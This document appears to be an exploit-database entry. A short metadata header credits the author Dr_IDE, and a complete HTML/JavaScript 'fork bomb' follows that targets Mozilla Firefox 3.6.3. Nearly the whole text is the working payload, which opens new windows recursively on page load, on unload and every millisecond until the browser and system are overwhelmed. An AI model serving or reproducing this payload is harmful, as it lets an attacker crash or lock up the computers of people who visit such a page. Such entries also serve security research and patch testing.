[] NeoSense

Mozilla Firefox 3.6.3 - Fork Bomb (Denial of Service)

Author: Dr_IDE
type: dos
platform: windows
port: 
date_added: 2010-05-02 
date_updated: 2017-09-01 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comFirefox_Setup_3.6.3.exe

<html>
<script>
var a = ('javascript:"<html><head><title>Dr_IDE\s FireFox Fork Bomb!</title></head><body onunload=\\"javascript:window.open(window.location);window.open(window.location)\\" onload=\\"javascript:window.open(window.location);window.open(window.location)\\"></body></html>"');
loop1();

function loop1()
{
    window.open(a);
    setInterval(loop1,1);
}
</script>
<body onload="javascript:loop1()"></body>
</html>